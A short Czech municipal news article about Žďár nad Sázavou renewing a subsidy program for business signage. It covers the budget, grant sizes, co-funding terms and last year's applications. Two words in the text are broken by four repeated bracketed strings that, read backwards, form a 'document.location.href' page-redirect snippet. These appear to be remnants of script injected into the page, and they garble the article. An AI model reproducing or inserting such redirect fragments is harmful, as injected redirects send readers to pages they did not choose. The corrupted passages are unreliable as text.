Rainbow page separator

Podnikatelé budou opět moci využít dotaci na vývěsní štíty

Pátek, 17. prosince 2021

Žďár nad Sázavou / Využít program na podporu označování provozoven a obchodních domů budou po schválení zastupiteli moci podnikatelé i v příštím roce. Vyhrazeno je pro něj celkem 350 tisíc korun, a pokud si živnostník nebo podnikatelský subjekt označí svoji provozovnu v souladu s takzvaným manuálem dobré praxe, může od města získat podporu ve výši od pěti do třiceti tisíc korun. To platí při nejméně dvacetiprocentní finanční spoluúčasti žadatele o dotační podporu. Záměrem města je snaha o kultivovanější reklamní sdělení ve veřejném pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru a eliminace vizuálního smogu. Dotaci je možné využít na grafické zpracování návrhu reklamní tabule, materiál, výrobu poutače nebo jeho montáž.
Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos bylo v dotačním programu celkem 200 tisíc korun a na výzvu města zareagovalo čtrnáct zájemců – jedna žádost byla vyřazena pro nesoulad s manuálem, dvě schváleny a uvedeny do praxe a zbývajících jedenáct se nachází ve fázi končící realizace.